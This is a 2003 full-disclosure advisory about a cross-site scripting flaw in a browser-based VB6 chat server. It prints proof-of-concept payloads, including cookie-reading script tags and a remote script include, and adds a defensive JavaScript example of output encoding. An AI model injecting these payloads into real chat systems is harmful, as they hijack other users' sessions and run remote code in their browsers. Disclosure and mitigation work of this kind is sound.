Message-ID: <Law11-OE50pOEuusqlf00023e08@hotmail.com>
Date: Fri, 15 Aug 2003 15:40:09 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: CHAT SERVER - XSS push
------------------------------------------------------------------
- EXPL-A-2003-019 exploitlabs.com Advisory 019
------------------------------------------------------------------
-= CHAT SERVER =-
exploitlabs
Aug 08, 2003
Product:
--------
Chat Server ( by author of "Sleuth 1.4" )
http://sandsprite.com/codestuff.asp
download and vb6 sources:
http://sandsprite.com/CodeStuff/chatserver.zip
Vulnerability(s):
----------------
1. XSS ( push through )
Description of product:
-----------------------
Web browser based chatserver similar
to the Magma Chatserver that powers huge
sites like chatropolis.com. This will show
just how they can stream text into a browser
and display it realtime. Have an unlimited
number of people all chatting at once using
only their web browsers :) pretty neat
chatserver is a server application
and runs by default on port 80
note: chatropolis.com is not affected
VULNERABILITY / EXPLOIT
======================
1. XSS is able to be "pushed" from one
chatter to another, with the results being
"forced" into any other chatters browser
for execution.
examples:
<script>alert("You are vunerable to xss ")</script>
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
<iframe src="http://whatismyip.com"></iframe>
<script language="JavaScript"
src="http://www.astalavista.com/backend/news.js"
type="text/javascript"></script>
note: the last one is remote code.
the vulnerability exists in the sample provided and after compiling from
the provided sources.
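Added example (not part of the original advisory and not code from
chatserver.zip): the push-through described above happens when chat text is
streamed to other browsers without output encoding. The sketch below puts an
assumed vulnerable relay beside a hardened one and runs the advisory's own
example strings through both. The function names and the
"<b>nick:</b> text<br>" line format are hypothetical.

```javascript
// Added example: output encoding for a browser chat relay.
// Hypothetical code, not taken from chatserver.zip.
'use strict';

// Characters that let chat text break out of an HTML text or attribute context.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function encodeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Assumed vulnerable pattern: chat text is concatenated into the streamed page as-is.
function relayUnsafe(nick, message) {
  return '<b>' + nick + ':</b> ' + message + '<br>\n';
}

// Hardened form: everything a chatter controls is encoded before it is streamed.
function relaySafe(nick, message) {
  return '<b>' + encodeHtml(nick) + ':</b> ' + encodeHtml(message) + '<br>\n';
}

// Markup the server template itself emits; any other tag came from a chatter.
const SERVER_TAGS = new Set(['<b>', '</b>', '<br>']);

// Returns the tags in a relayed line that did not come from the server template.
function injectedTags(line) {
  return (line.match(/<[^>]*>/g) || []).filter((tag) => !SERVER_TAGS.has(tag.toLowerCase()));
}

// The example strings from the advisory, used as test input.
const ADVISORY_SAMPLES = [
  '<script>alert("You are vunerable to xss ")</script>',
  '<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>',
  '<iframe src="http://whatismyip.com"></iframe>',
  '<script language="JavaScript" src="http://www.astalavista.com/backend/news.js" type="text/javascript"></script>',
];

// Number of chatter-supplied tags that survive the relay, per sample.
function audit(relay) {
  return ADVISORY_SAMPLES.map((s) => injectedTags(relay('guest', s)).length);
}

console.log('unsafe relay, injected tags per sample:', audit(relayUnsafe));
console.log('safe relay,   injected tags per sample:', audit(relaySafe));
```

The nickname is encoded as well as the message, since both are chatter-controlled and both end up in every other chatter's browser.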
Local:
------
yes
Remote:
-------
yes
Vendor Fix:
-----------
No fix on 0day
Vendor Contact:
---------------
Concurrent with this advisory
dzzie@...oo.com
Vendor Response:
----------------
:)
Credits:
--------
Donnie Werner
morning_wood@...labs.com
http://e2-labs.com
http://exploitlabs.com
original advisory may be obtained at
http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html